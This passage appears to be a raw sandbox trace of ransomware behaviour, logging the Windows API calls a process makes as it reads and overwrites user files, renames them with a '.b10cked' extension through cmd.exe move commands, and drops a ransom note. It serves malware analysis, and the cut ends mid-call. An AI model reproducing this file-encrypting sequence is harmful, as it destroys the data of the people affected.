hFile=0x1b4, lDistanceToMove=-36593, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8ef3 [0229.180] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8ef1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.181] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-36593, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8ef3 [0229.181] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x8ef1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VX2e_AgjuFQyd1Woq.bmp", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0229.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VX2e_AgjuFQyd1Woq.bmp", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VX2e_AgjuFQyd1Woq.bmp", lpUsedDefaultChar=0x0) returned 21 [0229.185] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x11de4 [0229.185] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.185] CloseHandle (hObject=0x1b4) returned 1 [0229.186] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP") returned 0x25 [0229.187] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0229.187] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9c4, dwThreadId=0xeb0)) returned 1 [0229.192] CloseHandle (hObject=0x120) returned 1 [0229.192] CloseHandle (hObject=0x1b4) returned 1 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0229.192] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.192] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.192] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0229.192] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.192] ReleaseMutex (hMutex=0xf8) returned 1 [0229.192] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.192] ReleaseMutex (hMutex=0xf8) returned 1 [0229.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.193] ReleaseMutex (hMutex=0xf8) returned 1 [0229.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.193] ReleaseMutex (hMutex=0xf8) returned 1 [0229.193] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\1uB93z-ou.pptx" (normalized: "c:\\users\\eebsym5\\documents\\1ub93z-ou.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28598221051) returned 1 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb4a [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.193] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb4a [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.194] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x662 [0229.194] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.195] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.195] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb4a [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb4a [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.196] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x5a4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x5a4, lpOverlapped=0x0) returned 1 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.196] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x5a4, lpOverlapped=0x0) returned 1 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1444, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5a6 [0229.196] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x5a4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x5a4, lpOverlapped=0x0) returned 1 [0229.196] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1444, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5a6 [0229.196] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x5a4, lpOverlapped=0x0) returned 1 [0229.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1uB93z-ou.pptx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0229.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1uB93z-ou.pptx", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1uB93z-ou.pptx", lpUsedDefaultChar=0x0) returned 14 [0229.200] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb4a [0229.200] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.201] CloseHandle (hObject=0x1b4) returned 1 [0229.201] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\1uB93z-ou.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT") returned 0x26 [0229.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0229.202] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\1UB93Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\1uB93z-ou.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xe80, dwThreadId=0xe7c)) returned 1 [0229.486] CloseHandle (hObject=0x120) returned 1 [0229.486] CloseHandle (hObject=0x1b4) returned 1 [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0229.486] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 3 [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0229.486] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.486] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0229.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0229.487] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0229.487] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.487] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0229.487] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0229.487] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.487] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x748, dwThreadId=0x9a8)) returned 1 [0229.495] CloseHandle (hObject=0x120) returned 1 [0229.495] CloseHandle (hObject=0x1b4) returned 1 [0229.495] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0229.495] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.495] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0229.495] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.496] ReleaseMutex (hMutex=0xf8) returned 1 [0229.496] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\g ol7OxwE18leXod.csv" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\g ol7oxwe18lexod.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.496] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28628567735) returned 1 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d81 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 